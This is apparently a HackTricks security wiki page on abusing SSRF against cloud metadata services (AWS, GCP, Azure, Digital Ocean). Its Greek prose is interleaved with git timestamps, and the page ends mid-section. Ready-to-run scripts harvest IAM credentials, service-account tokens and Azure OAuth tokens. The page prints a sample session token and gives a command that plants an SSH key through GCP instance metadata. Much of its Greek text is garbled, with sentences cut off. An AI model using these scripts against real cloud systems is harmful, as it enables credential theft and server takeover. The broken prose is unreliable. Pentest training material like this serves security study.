2022-05-02 18:53:13 +00:00
# Cloud SSRF
2022-04-28 16:01:33 +00:00
2024-07-19 16:35:17 +00:00
{% hint style="success" %}
Learn & practice AWS Hacking:< img src = "/.gitbook/assets/arte.png" alt = "" data-size = "line" > [**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)< img src = "/.gitbook/assets/arte.png" alt = "" data-size = "line" > \
Learn & practice GCP Hacking: < img src = "/.gitbook/assets/grte.png" alt = "" data-size = "line" > [**HackTricks Training GCP Red Team Expert (GRTE)**< img src = "/.gitbook/assets/grte.png" alt = "" data-size = "line" > ](https://training.hacktricks.xyz/courses/grte)
2022-04-28 16:01:33 +00:00
2024-07-19 16:35:17 +00:00
< details >
2022-04-28 16:01:33 +00:00
2024-07-19 16:35:17 +00:00
< summary > Support HackTricks< / summary >
2024-01-01 17:15:10 +00:00
2024-07-19 16:35:17 +00:00
* Check the [**subscription plans** ](https://github.com/sponsors/carlospolop )!
* **Join the** 💬 [**Discord group** ](https://discord.gg/hRep4RUj7f ) or the [**telegram group** ](https://t.me/peass ) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live** ](https://twitter.com/hacktricks\_live )**.**
* **Share hacking tricks by submitting PRs to the** [**HackTricks** ](https://github.com/carlospolop/hacktricks ) and [**HackTricks Cloud** ](https://github.com/carlospolop/hacktricks-cloud ) github repos.
2022-04-28 16:01:33 +00:00
< / details >
2024-07-19 16:35:17 +00:00
{% endhint %}
2022-04-28 16:01:33 +00:00
2024-03-15 00:12:21 +00:00
**Try Hard Security Group**
2024-07-19 16:35:17 +00:00
< figure > < img src = "/.gitbook/assets/telegram-cloud-document-1-5159108904864449420.jpg" alt = "" > < figcaption > < / figcaption > < / figure >
2024-03-15 00:12:21 +00:00
{% embed url="https://discord.gg/tryhardsecurity" %}
***
2022-05-02 18:53:13 +00:00
## AWS
2022-04-28 16:01:33 +00:00
2024-07-19 16:35:17 +00:00
### Abusing SSRF in AWS EC2 environment
2022-02-13 12:30:13 +00:00
2024-07-19 16:35:17 +00:00
**Τ ο ν α γ ι `http://169.254.169.254` ([πληροφορίες γ ι α
2022-05-08 19:05:00 +00:00
2024-07-19 16:35:17 +00:00
Υπάρχουν **2 εκδόσεις** του metadata endpoint. Η **πρώτη** επιτρέπει την **πρόσβαση** στο endpoint μέσω **GET** αιτημάτων (έτσι οποιοδήποτε **SSRF μπορεί ν α ). Για την **έκδοση 2** , [IMDSv2 ](https://docs.aws.amazon.com/AWSEC2/latest/UserGuide/configuring-instance-metadata-service.html ), πρέπει ν α **token** στέλνοντας ένα **PUT** αίτημα με ένα **HTTP header** και στη συνέχεια ν α γ ι α ν α **πιο περίπλοκο ν α με ένα SSRF).
2022-05-08 19:05:00 +00:00
2023-08-28 09:09:07 +00:00
{% hint style="danger" %}
2024-07-19 16:35:17 +00:00
Σημειώστε ότι α ν **σύμφωνα με τα έγγραφα** ](https://docs.aws.amazon.com/AWSEC2/latest/UserGuide/instance-metadata-v2-how-it-works.html ), η **απάντηση του PUT αιτήματος** θα έχει ένα **hop limit 1** , καθιστώντας αδύνατη την πρόσβαση στο EC2 metadata από ένα κοντέινερ μέσα στην EC2 instance.
2023-08-28 09:09:07 +00:00
2024-07-19 16:35:17 +00:00
Επιπλέον, **IMDSv2** θα **μπλοκάρει επίσης αιτήματα γ ι α . Αυτό γίνεται γ ι α ν α
2023-08-28 09:09:07 +00:00
{% endhint %}
2022-06-02 13:49:01 +00:00
2024-07-19 16:35:17 +00:00
Μπορείτε ν α metadata endpoints στα έγγραφα ](https://docs.aws.amazon.com/AWSEC2/latest/UserGuide/instancedata-data-categories.html ). Στο παρακάτω σενάριο αποκτώνται κάποιες ενδιαφέρουσες πληροφορίες από αυτό:
2022-05-08 19:05:00 +00:00
```bash
EC2_TOKEN=$(curl -X PUT "http://169.254.169.254/latest/api/token" -H "X-aws-ec2-metadata-token-ttl-seconds: 21600" 2>/dev/null || wget -q -O - --method PUT "http://169.254.169.254/latest/api/token" --header "X-aws-ec2-metadata-token-ttl-seconds: 21600" 2>/dev/null)
HEADER="X-aws-ec2-metadata-token: $EC2_TOKEN"
URL="http://169.254.169.254/latest/meta-data"
aws_req=""
if [ "$(command -v curl)" ]; then
2024-02-10 22:40:18 +00:00
aws_req="curl -s -f -H '$HEADER'"
2022-05-08 19:05:00 +00:00
elif [ "$(command -v wget)" ]; then
2024-02-10 22:40:18 +00:00
aws_req="wget -q -O - -H '$HEADER'"
else
echo "Neither curl nor wget were found, I can't enumerate the metadata service :("
2022-05-08 19:05:00 +00:00
fi
2022-09-01 11:07:00 +00:00
printf "ami-id: "; eval $aws_req "$URL/ami-id"; echo ""
printf "instance-action: "; eval $aws_req "$URL/instance-action"; echo ""
printf "instance-id: "; eval $aws_req "$URL/instance-id"; echo ""
printf "instance-life-cycle: "; eval $aws_req "$URL/instance-life-cycle"; echo ""
printf "instance-type: "; eval $aws_req "$URL/instance-type"; echo ""
printf "region: "; eval $aws_req "$URL/placement/region"; echo ""
2022-05-08 19:05:00 +00:00
echo ""
2022-05-11 10:13:29 +00:00
echo "Account Info"
2022-09-01 11:07:00 +00:00
eval $aws_req "$URL/identity-credentials/ec2/info"; echo ""
eval $aws_req "http://169.254.169.254/latest/dynamic/instance-identity/document"; echo ""
2022-05-08 19:05:00 +00:00
echo ""
2022-05-11 10:13:29 +00:00
echo "Network Info"
2024-02-10 22:40:18 +00:00
for mac in $(eval $aws_req "$URL/network/interfaces/macs/" 2>/dev/null); do
echo "Mac: $mac"
printf "Owner ID: "; eval $aws_req "$URL/network/interfaces/macs/$mac/owner-id"; echo ""
printf "Public Hostname: "; eval $aws_req "$URL/network/interfaces/macs/$mac/public-hostname"; echo ""
printf "Security Groups: "; eval $aws_req "$URL/network/interfaces/macs/$mac/security-groups"; echo ""
echo "Private IPv4s:"; eval $aws_req "$URL/network/interfaces/macs/$mac/ipv4-associations/"; echo ""
printf "Subnet IPv4: "; eval $aws_req "$URL/network/interfaces/macs/$mac/subnet-ipv4-cidr-block"; echo ""
echo "PrivateIPv6s:"; eval $aws_req "$URL/network/interfaces/macs/$mac/ipv6s"; echo ""
printf "Subnet IPv6: "; eval $aws_req "$URL/network/interfaces/macs/$mac/subnet-ipv6-cidr-blocks"; echo ""
echo "Public IPv4s:"; eval $aws_req "$URL/network/interfaces/macs/$mac/public-ipv4s"; echo ""
echo ""
2022-05-08 19:05:00 +00:00
done
echo ""
2022-05-11 10:13:29 +00:00
echo "IAM Role"
2022-09-01 11:07:00 +00:00
eval $aws_req "$URL/iam/info"
2024-02-10 22:40:18 +00:00
for role in $(eval $aws_req "$URL/iam/security-credentials/" 2>/dev/null); do
echo "Role: $role"
eval $aws_req "$URL/iam/security-credentials/$role"; echo ""
echo ""
2022-05-08 19:05:00 +00:00
done
echo ""
2022-05-11 10:13:29 +00:00
echo "User Data"
2022-05-08 19:05:00 +00:00
# Search hardcoded credentials
2022-09-01 11:07:00 +00:00
eval $aws_req "http://169.254.169.254/latest/user-data"
2022-10-28 09:19:40 +00:00
echo ""
echo "EC2 Security Credentials"
eval $aws_req "$URL/identity-credentials/ec2/security-credentials/ec2-instance"; echo ""
2022-02-13 12:30:13 +00:00
```
2024-07-19 16:35:17 +00:00
Ως ένα **δημόσια διαθέσιμο παράδειγμα IAM credentials** που έχει εκτεθεί, μπορείτε ν α http://4d0cf09b9b2d761a7d87be99d17507bce8b86f3b.flaws.cloud/proxy/169.254.169.254/latest/meta-data/iam/security-credentials/flaws ](http://4d0cf09b9b2d761a7d87be99d17507bce8b86f3b.flaws.cloud/proxy/169.254.169.254/latest/meta-data/iam/security-credentials/flaws )
2024-04-06 18:31:47 +00:00
2024-07-19 16:35:17 +00:00
Μπορείτε επίσης ν α **EC2 security credentials** στο: [http://4d0cf09b9b2d761a7d87be99d17507bce8b86f3b.flaws.cloud/proxy/169.254.169.254/latest/meta-data/identity-credentials/ec2/security-credentials/ec2-instance ](http://4d0cf09b9b2d761a7d87be99d17507bce8b86f3b.flaws.cloud/proxy/169.254.169.254/latest/meta-data/identity-credentials/ec2/security-credentials/ec2-instance )
2022-02-13 12:30:13 +00:00
2024-07-19 16:35:17 +00:00
Μπορείτε στη συνέχεια ν α **αυτά τα credentials και ν α . Αυτό θα σας επιτρέψει ν α **οτιδήποτε έχει άδειες** αυτός ο
2024-04-06 18:31:47 +00:00
2024-07-19 16:35:17 +00:00
Για ν α ν α
2022-02-13 12:30:13 +00:00
```
[profilename]
2024-07-19 16:35:17 +00:00
aws_access_key_id = ASIA6GG71[...]
aws_secret_access_key = a5kssI2I4H/atUZOwBr5Vpggd9CxiT[...]
2022-02-13 12:30:13 +00:00
aws_session_token = AgoJb3JpZ2luX2VjEGcaCXVzLXdlc3QtMiJHMEUCIHgCnKJl8fwc+0iaa6n4FsgtWaIikf5mSSoMIWsUGMb1AiEAlOiY0zQ31XapsIjJwgEXhBIW3u/XOfZJTrvdNe4rbFwq2gMIYBAAGgw5NzU0MjYyNjIwMjkiDCvj4qbZSIiiBUtrIiq3A8IfXmTcebRDxJ9BGjNwLbOYDlbQYXBIegzliUez3P/fQxD3qDr+SNFg9w6WkgmDZtjei6YzOc/a9TWgIzCPQAWkn6BlXufS+zm4aVtcgvBKyu4F432AuT4Wuq7zrRc+42m3Z9InIM0BuJtzLkzzbBPfZAz81eSXumPdid6G/4v+o/VxI3OrayZVT2+fB34cKujEOnBwgEd6xUGUcFWb52+jlIbs8RzVIK/xHVoZvYpY6KlmLOakx/mOyz1tb0Z204NZPJ7rj9mHk+cX/G0BnYGIf8ZA2pyBdQyVbb1EzV0U+IPlI+nkIgYCrwTCXUOYbm66lj90frIYG0x2qI7HtaKKbRM5pcGkiYkUAUvA3LpUW6LVn365h0uIbYbVJqSAtjxUN9o0hbQD/W9Y6ZM0WoLSQhYt4jzZiWi00owZJjKHbBaQV6RFwn5mCD+OybS8Y1dn2lqqJgY2U78sONvhfewiohPNouW9IQ7nPln3G/dkucQARa/eM/AC1zxLu5nt7QY8R2x9FzmKYGLh6sBoNO1HXGzSQlDdQE17clcP+hrP/m49MW3nq/A7WHIczuzpn4zv3KICLPIw2uSc7QU6tAEln14bV0oHtHxqC6LBnfhx8yaD9C71j8XbDrfXOEwdOy2hdK0M/AJ3CVe/mtxf96Z6UpqVLPrsLrb1TYTEWCH7yleN0i9koRQDRnjntvRuLmH2ERWLtJFgRU2MWqDNCf2QHWn+j9tYNKQVVwHs3i8paEPyB45MLdFKJg6Ir+Xzl2ojb6qLGirjw8gPufeCM19VbpeLPliYeKsrkrnXWO0o9aImv8cvIzQ8aS1ihqOtkedkAsw=
```
2024-07-19 16:35:17 +00:00
Παρατηρήστε το **aws\_session\_token** , αυτό είναι απαραίτητο γ ι α ν α
2024-04-06 18:31:47 +00:00
2024-07-19 16:35:17 +00:00
[**PACU** ](https://github.com/RhinoSecurityLabs/pacu ) μπορεί ν α γ ι α ν α ν α ν α
2022-02-13 12:30:13 +00:00
2024-07-19 16:35:17 +00:00
### SSRF σε AWS ECS (Container Service) διαπιστευτήρια
2022-02-13 12:30:13 +00:00
2024-07-19 16:35:17 +00:00
**ECS**, είναι μια λογική ομάδα EC2 instances στην οποία μπορείτε ν α ν α ν α γ ι α ν α **ECS** , ο ι **metadata endpoints αλλάζουν** .
2024-04-06 18:31:47 +00:00
2024-07-19 16:35:17 +00:00
Εάν αποκτήσετε πρόσβαση στο _**http://169.254.170.2/v2/credentials/\<GUID>**_ θα βρείτε τα διαπιστευτήρια της μηχανής ECS. Αλλά πρώτα πρέπει ν α **βρείτε το \<GUID>** . Για ν α ν α **environ** **AWS\_CONTAINER\_CREDENTIALS\_RELATIVE\_URI** μέσα στη μηχανή.\
Θα μπορούσατε ν α ν α **Path Traversal** στο `file:///proc/self/environ` \
Η ν α **AccessKey, SecretKey και token** .
2022-02-13 12:30:13 +00:00
```bash
2022-06-02 12:02:53 +00:00
curl "http://169.254.170.2$AWS_CONTAINER_CREDENTIALS_RELATIVE_URI" 2>/dev/null || wget "http://169.254.170.2$AWS_CONTAINER_CREDENTIALS_RELATIVE_URI" -O -
2022-02-13 12:30:13 +00:00
```
2022-06-01 15:39:15 +00:00
{% hint style="info" %}
2024-07-19 16:35:17 +00:00
Σημειώστε ότι σε **ορισμένες περιπτώσεις** θα μπορείτε ν α **μεταδεδομένα EC2** από το κοντέινερ (ελέγξτε τους περιορισμούς TTL του IMDSv2 που αναφέρθηκαν προηγουμένως). Σε αυτά τα σενάρια από το κοντέινερ θα μπορούσατε ν α
2022-06-01 15:39:15 +00:00
{% endhint %}
2024-07-19 16:35:17 +00:00
### SSRF γ ι α
2022-05-11 11:17:22 +00:00
2024-07-19 16:35:17 +00:00
Σε αυτή την περίπτωση ο ι **διαπιστευτήρια αποθηκεύονται σε μεταβλητές περιβάλλοντος** . Έτσι, γ ι α ν α ν α ** `file:///proc/self/environ` **.
2022-07-27 16:08:17 +00:00
2024-07-19 16:35:17 +00:00
Τ ο **όνομα** των **ενδιαφερόντων μεταβλητών περιβάλλοντος** είναι:
2022-07-27 16:08:17 +00:00
* `AWS_SESSION_TOKEN`
* `AWS_SECRET_ACCESS_KEY`
* `AWS_ACCES_KEY_ID`
2024-07-19 16:35:17 +00:00
Επιπλέον, εκτός από τα διαπιστευτήρια IAM, ο ι **δεδομένα εκδήλωσης που μεταφέρονται στη λειτουργία όταν ξεκινά** . Αυτά τα δεδομένα είναι διαθέσιμα στη λειτουργία μέσω της [διεπαφής χρόνου εκτέλεσης ](https://docs.aws.amazon.com/lambda/latest/dg/runtimes-api.html ) και θα μπορούσαν ν α **ευαίσθητες** **πληροφορίες** (όπως μέσα στις **stageVariables** ). Σε αντίθεση με τα διαπιστευτήρια IAM, αυτά τα δεδομένα είναι προσβάσιμα μέσω τυπικού SSRF στο ** `http://localhost:9001/2018-06-01/runtime/invocation/next` **.
2022-05-11 11:17:22 +00:00
2022-06-02 16:20:19 +00:00
{% hint style="warning" %}
2024-07-19 16:35:17 +00:00
Σημειώστε ότι τα **διαπιστευτήρια lambda** είναι μέσα στις **μεταβλητές περιβάλλοντος** . Έτσι, α ν **στοίβα παρακολούθησης** του κώδικα lambda εκτυπώνει μεταβλητές περιβάλλοντος, είναι δυνατόν ν α **εξαχθούν προκαλώντας ένα σφάλμα** στην εφαρμογή.
2022-06-02 16:20:19 +00:00
{% endhint %}
2024-07-19 16:35:17 +00:00
### SSRF URL γ ι α
2024-04-06 18:31:47 +00:00
2024-07-19 16:35:17 +00:00
Ανακτούμε το `accountId` και την `region` από το API.
2022-02-13 12:30:13 +00:00
```
http://169.254.169.254/latest/dynamic/instance-identity/document
http://169.254.169.254/latest/meta-data/iam/security-credentials/aws-elasticbeanorastalk-ec2-role
```
2024-07-19 16:35:17 +00:00
Στη συνέχεια, ανακτούμε το `AccessKeyId` , `SecretAccessKey` και `Token` από το API.
2022-02-13 12:30:13 +00:00
```
http://169.254.169.254/latest/meta-data/iam/security-credentials/aws-elasticbeanorastalk-ec2-role
```
 
2024-07-19 16:35:17 +00:00
Στη συνέχεια, χρησιμοποιούμε τα διαπιστευτήρια με `aws s3 ls s3://elasticbeanstalk-us-east-2-[ACCOUNT_ID]/` .
2022-02-13 12:30:13 +00:00
2024-01-22 12:24:45 +00:00
## GCP <a href="#id-6440" id="id-6440"></a>
2022-05-02 18:53:13 +00:00
2024-07-19 16:35:17 +00:00
Μπορείτε ν α **βρείτε εδώ τα έγγραφα σχετικά με τα endpoints μεταδεδομένων** ](https://cloud.google.com/appengine/docs/standard/java/accessing-instance-metadata ).
2022-02-13 12:30:13 +00:00
2024-02-10 22:40:18 +00:00
### SSRF URL γ ι α
2022-02-13 12:30:13 +00:00
2024-07-19 16:35:17 +00:00
Απαιτεί την HTTP κεφαλίδα ** `Metadata-Flavor: Google` ** και μπορείτε ν α
2022-02-13 12:30:13 +00:00
2022-02-16 09:28:48 +00:00
* http://169.254.169.254
* http://metadata.google.internal
* http://metadata
2022-02-13 12:30:13 +00:00
2024-07-19 16:35:17 +00:00
Ενδιαφέροντα endpoints γ ι α
2022-02-16 09:28:48 +00:00
```bash
# /project
2022-05-01 12:41:36 +00:00
# Project name and number
2024-02-23 17:48:55 +00:00
curl -s -H "Metadata-Flavor:Google" http://metadata/computeMetadata/v1/project/project-id
curl -s -H "Metadata-Flavor:Google" http://metadata/computeMetadata/v1/project/numeric-project-id
2022-05-01 12:41:36 +00:00
# Project attributes
2024-02-23 17:48:55 +00:00
curl -s -H "Metadata-Flavor:Google" http://metadata/computeMetadata/v1/project/attributes/?recursive=true
2022-02-16 09:28:48 +00:00
# /oslogin
2022-05-01 12:41:36 +00:00
# users
2023-02-20 18:01:10 +00:00
curl -s -f -H "Metadata-Flavor: Google" http://metadata/computeMetadata/v1/oslogin/users
2022-05-01 12:41:36 +00:00
# groups
2023-02-20 18:01:10 +00:00
curl -s -f -H "Metadata-Flavor: Google" http://metadata/computeMetadata/v1/oslogin/groups
2022-05-01 12:41:36 +00:00
# security-keys
2023-02-20 18:01:10 +00:00
curl -s -f -H "Metadata-Flavor: Google" http://metadata/computeMetadata/v1/oslogin/security-keys
2022-05-01 12:41:36 +00:00
# authorize
2023-02-20 18:01:10 +00:00
curl -s -f -H "Metadata-Flavor: Google" http://metadata/computeMetadata/v1/oslogin/authorize
2022-02-16 09:28:48 +00:00
# /instance
2022-05-01 12:41:36 +00:00
# Description
2024-02-23 17:48:55 +00:00
curl -s -H "Metadata-Flavor:Google" http://metadata/computeMetadata/v1/instance/description
2022-05-01 12:41:36 +00:00
# Hostname
2024-02-23 17:48:55 +00:00
curl -s -H "Metadata-Flavor:Google" http://metadata/computeMetadata/v1/instance/hostname
2022-05-01 12:41:36 +00:00
# ID
2024-02-23 17:48:55 +00:00
curl -s -H "Metadata-Flavor:Google" http://metadata/computeMetadata/v1/instance/id
2022-05-01 12:41:36 +00:00
# Image
2024-02-23 17:48:55 +00:00
curl -s -H "Metadata-Flavor:Google" http://metadata/computeMetadata/v1/instance/image
2022-05-01 12:41:36 +00:00
# Machine Type
2024-02-23 17:48:55 +00:00
curl -s -H "Metadata-Flavor: Google" http://metadata/computeMetadata/v1/instance/machine-type
2022-05-01 12:41:36 +00:00
# Name
2024-02-23 17:48:55 +00:00
curl -s -H "Metadata-Flavor: Google" http://metadata/computeMetadata/v1/instance/name
2022-05-01 12:41:36 +00:00
# Tags
2023-02-20 18:01:10 +00:00
curl -s -f -H "Metadata-Flavor: Google" http://metadata/computeMetadata/v1/instance/scheduling/tags
2022-05-01 12:41:36 +00:00
# Zone
2023-02-20 18:01:10 +00:00
curl -s -f -H "Metadata-Flavor: Google" http://metadata/computeMetadata/v1/instance/zone
2023-01-24 14:43:15 +00:00
# User data
curl -s -f -H "Metadata-Flavor: Google" "http://metadata/computeMetadata/v1/instance/attributes/startup-script"
2022-05-01 12:41:36 +00:00
# Network Interfaces
2024-02-10 22:40:18 +00:00
for iface in $(curl -s -f -H "Metadata-Flavor: Google" "http://metadata/computeMetadata/v1/instance/network-interfaces/"); do
echo " IP: "$(curl -s -f -H "Metadata-Flavor: Google" "http://metadata/computeMetadata/v1/instance/network-interfaces/$iface/ip")
echo " Subnetmask: "$(curl -s -f -H "X-Google-Metadata-Request: True" "http://metadata/computeMetadata/v1/instance/network-interfaces/$iface/subnetmask")
echo " Gateway: "$(curl -s -f -H "Metadata-Flavor: Google" "http://metadata/computeMetadata/v1/instance/network-interfaces/$iface/gateway")
echo " DNS: "$(curl -s -f -H "Metadata-Flavor: Google" "http://metadata/computeMetadata/v1/instance/network-interfaces/$iface/dns-servers")
echo " Network: "$(curl -s -f -H "Metadata-Flavor: Google" "http://metadata/computeMetadata/v1/instance/network-interfaces/$iface/network")
echo " ============== "
2022-02-16 09:28:48 +00:00
done
2022-05-01 12:41:36 +00:00
# Service Accounts
2024-02-10 22:40:18 +00:00
for sa in $(curl -s -f -H "Metadata-Flavor: Google" "http://metadata/computeMetadata/v1/instance/service-accounts/"); do
echo " Name: $sa"
echo " Email: "$(curl -s -f -H "Metadata-Flavor: Google" "http://metadata/computeMetadata/v1/instance/service-accounts/${sa}email")
echo " Aliases: "$(curl -s -f -H "Metadata-Flavor: Google" "http://metadata/computeMetadata/v1/instance/service-accounts/${sa}aliases")
echo " Identity: "$(curl -s -f -H "Metadata-Flavor: Google" "http://metadata/computeMetadata/v1/instance/service-accounts/${sa}identity")
echo " Scopes: "$(curl -s -f -H "Metadata-Flavor: Google" "http://metadata/computeMetadata/v1/instance/service-accounts/${sa}scopes")
echo " Token: "$(curl -s -f -H "Metadata-Flavor: Google" "http://metadata/computeMetadata/v1/instance/service-accounts/${sa}token")
echo " ============== "
2022-02-16 09:28:48 +00:00
done
2022-05-01 12:41:36 +00:00
# K8s Attributtes
## Cluster location
2023-02-20 18:01:10 +00:00
curl -s -f -H "Metadata-Flavor: Google" http://metadata/computeMetadata/v1/instance/attributes/cluster-location
2022-05-01 12:41:36 +00:00
## Cluster name
2023-02-20 18:01:10 +00:00
curl -s -f -H "Metadata-Flavor: Google" http://metadata/computeMetadata/v1/instance/attributes/cluster-name
2022-05-01 12:41:36 +00:00
## Os-login enabled
2023-02-20 18:01:10 +00:00
curl -s -f -H "Metadata-Flavor: Google" http://metadata/computeMetadata/v1/instance/attributes/enable-oslogin
2022-05-01 12:41:36 +00:00
## Kube-env
2023-02-20 18:01:10 +00:00
curl -s -f -H "Metadata-Flavor: Google" http://metadata/computeMetadata/v1/instance/attributes/kube-env
2022-05-01 12:41:36 +00:00
## Kube-labels
2023-02-20 18:01:10 +00:00
curl -s -f -H "Metadata-Flavor: Google" http://metadata/computeMetadata/v1/instance/attributes/kube-labels
2022-05-01 12:41:36 +00:00
## Kubeconfig
2023-02-20 18:01:10 +00:00
curl -s -f -H "Metadata-Flavor: Google" http://metadata/computeMetadata/v1/instance/attributes/kubeconfig
2023-02-19 18:39:32 +00:00
# All custom project attributes
curl "http://metadata.google.internal/computeMetadata/v1/project/attributes/?recursive=true& alt=text" \
2024-02-10 22:40:18 +00:00
-H "Metadata-Flavor: Google"
2023-02-19 18:39:32 +00:00
# All custom project attributes instance attributes
curl "http://metadata.google.internal/computeMetadata/v1/instance/attributes/?recursive=true& alt=text" \
2024-02-10 22:40:18 +00:00
-H "Metadata-Flavor: Google"
2022-02-13 12:30:13 +00:00
```
2024-07-19 16:35:17 +00:00
Beta δεν απαιτεί header αυτή τη στιγμή (ευχαριστώ Mathias Karlsson @avlidienbrunn )
2022-02-13 12:30:13 +00:00
```
http://metadata.google.internal/computeMetadata/v1beta1/
http://metadata.google.internal/computeMetadata/v1beta1/?recursive=true
```
2023-01-20 15:45:29 +00:00
{% hint style="danger" %}
2024-07-19 16:35:17 +00:00
Για ν α **χρησιμοποιήσετε το εξαγόμενο διαπιστευτήριο υπηρεσίας** μπορείτε απλά ν α
2023-01-20 15:45:29 +00:00
```bash
# Via env vars
export CLOUDSDK_AUTH_ACCESS_TOKEN=< token >
2023-01-25 11:53:16 +00:00
gcloud projects list
2023-01-20 15:45:29 +00:00
# Via setup
echo "< token > " > /some/path/to/token
gcloud config set auth/access_token_file /some/path/to/token
2023-01-25 11:53:16 +00:00
gcloud projects list
2023-01-22 18:27:01 +00:00
gcloud config unset auth/access_token_file
2023-01-20 15:45:29 +00:00
```
{% endhint %}
2024-03-09 14:12:47 +00:00
### Προσθέστε ένα κλειδί SSH <a href="#id-3e24" id="id-3e24"></a>
2022-02-13 12:30:13 +00:00
2024-07-19 16:35:17 +00:00
Εξαγάγετε το διακριτικό
2022-02-13 12:30:13 +00:00
```
http://metadata.google.internal/computeMetadata/v1beta1/instance/service-accounts/default/token?alt=json
```
2024-07-19 16:35:17 +00:00
Ελέγξτε το πεδίο εφαρμογής του token (με την προηγούμενη έξοδο ή εκτελώντας το παρακάτω)
2024-02-23 17:48:55 +00:00
```bash
curl https://www.googleapis.com/oauth2/v1/tokeninfo?access_token=ya29.XXXXXKuXXXXXXXkGT0rJSA {
2024-02-10 22:40:18 +00:00
"issued_to": "101302079XXXXX",
"audience": "10130207XXXXX",
"scope": "https://www.googleapis.com/auth/compute https://www.googleapis.com/auth/logging.write https://www.googleapis.com/auth/devstorage.read_write https://www.googleapis.com/auth/monitoring",
"expires_in": 2443,
"access_type": "offline"
2022-02-13 12:30:13 +00:00
}
```
2024-07-19 16:35:17 +00:00
Τώρα σπρώξτε το κλειδί SSH.
2022-02-13 12:30:13 +00:00
2023-05-10 14:04:00 +00:00
{% code overflow="wrap" %}
2023-01-20 15:45:29 +00:00
```bash
2024-02-10 22:40:18 +00:00
curl -X POST "https://www.googleapis.com/compute/v1/projects/1042377752888/setCommonInstanceMetadata"
-H "Authorization: Bearer ya29.c.EmKeBq9XI09_1HK1XXXXXXXXT0rJSA"
-H "Content-Type: application/json"
2022-02-13 12:30:13 +00:00
--data '{"items": [{"key": "sshkeyname", "value": "sshkeyvalue"}]}'
```
2023-05-10 14:04:00 +00:00
{% endcode %}
2022-02-13 12:30:13 +00:00
2024-03-03 13:58:44 +00:00
### Cloud Functions <a href="#id-9f1f" id="id-9f1f"></a>
2024-02-23 17:48:55 +00:00
2024-07-19 16:35:17 +00:00
Η
2024-02-23 17:48:55 +00:00
```bash
# /project
# Project name and number
curl -s -H "Metadata-Flavor:Google" http://metadata/computeMetadata/v1/project/project-id
curl -s -H "Metadata-Flavor:Google" http://metadata/computeMetadata/v1/project/numeric-project-id
# /instance
# ID
curl -s -H "Metadata-Flavor:Google" http://metadata/computeMetadata/v1/instance/id
# Zone
curl -s -f -H "Metadata-Flavor: Google" http://metadata/computeMetadata/v1/instance/zone
# Auto MTLS config
curl -s -H "Metadata-Flavor:Google" http://metadata/computeMetadata/v1/instance/platform-security/auto-mtls-configuration
# Service Accounts
for sa in $(curl -s -f -H "Metadata-Flavor: Google" "http://metadata/computeMetadata/v1/instance/service-accounts/"); do
echo " Name: $sa"
echo " Email: "$(curl -s -f -H "Metadata-Flavor: Google" "http://metadata/computeMetadata/v1/instance/service-accounts/${sa}email")
echo " Aliases: "$(curl -s -f -H "Metadata-Flavor: Google" "http://metadata/computeMetadata/v1/instance/service-accounts/${sa}aliases")
echo " Identity: "$(curl -s -f -H "Metadata-Flavor: Google" "http://metadata/computeMetadata/v1/instance/service-accounts/${sa}identity")
echo " Scopes: "$(curl -s -f -H "Metadata-Flavor: Google" "http://metadata/computeMetadata/v1/instance/service-accounts/${sa}scopes")
echo " Token: "$(curl -s -f -H "Metadata-Flavor: Google" "http://metadata/computeMetadata/v1/instance/service-accounts/${sa}token")
echo " ============== "
done
```
2024-01-22 12:24:45 +00:00
## Digital Ocean <a href="#id-9f1f" id="id-9f1f"></a>
2022-02-13 12:30:13 +00:00
2022-12-13 22:52:41 +00:00
{% hint style="warning" %}
2024-07-19 16:35:17 +00:00
Δεν υπάρχουν πράγματα όπως ο ι ο ι ν α
2022-12-13 22:52:41 +00:00
{% endhint %}
2024-07-19 16:35:17 +00:00
Documentation available at [`https://developers.digitalocean.com/documentation/metadata/` ](https://developers.digitalocean.com/documentation/metadata/ )
2022-02-13 12:30:13 +00:00
```
curl http://169.254.169.254/metadata/v1/id
http://169.254.169.254/metadata/v1.json
2024-02-10 22:40:18 +00:00
http://169.254.169.254/metadata/v1/
2022-02-13 12:30:13 +00:00
http://169.254.169.254/metadata/v1/id
http://169.254.169.254/metadata/v1/user-data
http://169.254.169.254/metadata/v1/hostname
http://169.254.169.254/metadata/v1/region
http://169.254.169.254/metadata/v1/interfaces/public/0/ipv6/addressAll in one request:
curl http://169.254.169.254/metadata/v1.json | jq
```
2022-05-02 18:53:13 +00:00
## Azure <a href="#cea8" id="cea8"></a>
2022-02-13 12:30:13 +00:00
2022-09-25 18:26:29 +00:00
### Azure VM
2022-02-13 12:30:13 +00:00
2024-07-19 16:35:17 +00:00
[**Έγγραφα** εδώ ](https://learn.microsoft.com/en-us/azure/virtual-machines/windows/instance-metadata-service?tabs=linux ).
2022-02-13 12:30:13 +00:00
2024-07-19 16:35:17 +00:00
* **Πρέπει** ν α `Metadata: true`
* Δεν πρέπει **ν α περιέχει μια κεφαλίδα `X-Forwarded-For`
2024-04-06 18:31:47 +00:00
2024-07-19 16:35:17 +00:00
{% tabs %}
{% tab title="Bash" %}
{% code overflow="wrap" %}
2023-05-10 14:04:00 +00:00
```bash
HEADER="Metadata:true"
URL="http://169.254.169.254/metadata"
API_VERSION="2021-12-13" #https://learn .microsoft.com/en-us/azure/virtual-machines/instance-metadata-service?tabs=linux#supported-api-versions
echo "Instance details"
curl -s -f -H "$HEADER" "$URL/instance?api-version=$API_VERSION"
echo "Load Balancer details"
curl -s -f -H "$HEADER" "$URL/loadbalancer?api-version=$API_VERSION"
echo "Management Token"
curl -s -f -H "$HEADER" "$URL/identity/oauth2/token?api-version=$API_VERSION& resource=https://management.azure.com/"
echo "Graph token"
curl -s -f -H "$HEADER" "$URL/identity/oauth2/token?api-version=$API_VERSION& resource=https://graph.microsoft.com/"
echo "Vault token"
curl -s -f -H "$HEADER" "$URL/identity/oauth2/token?api-version=$API_VERSION& resource=https://vault.azure.net/"
echo "Storage token"
curl -s -f -H "$HEADER" "$URL/identity/oauth2/token?api-version=$API_VERSION& resource=https://storage.azure.com/"
```
2024-07-19 16:35:17 +00:00
{% endcode %}
{% endtab %}
2023-05-10 14:04:00 +00:00
2024-07-19 16:35:17 +00:00
{% tab title="PS" %}
2023-05-10 14:04:00 +00:00
```bash
2022-09-25 18:26:29 +00:00
# Powershell
Invoke-RestMethod -Headers @{"Metadata"="true"} -Method GET -NoProxy -Uri "http://169.254.169.254/metadata/instance?api-version=2021-02-01" | ConvertTo-Json -Depth 64
2022-10-30 18:21:55 +00:00
## User data
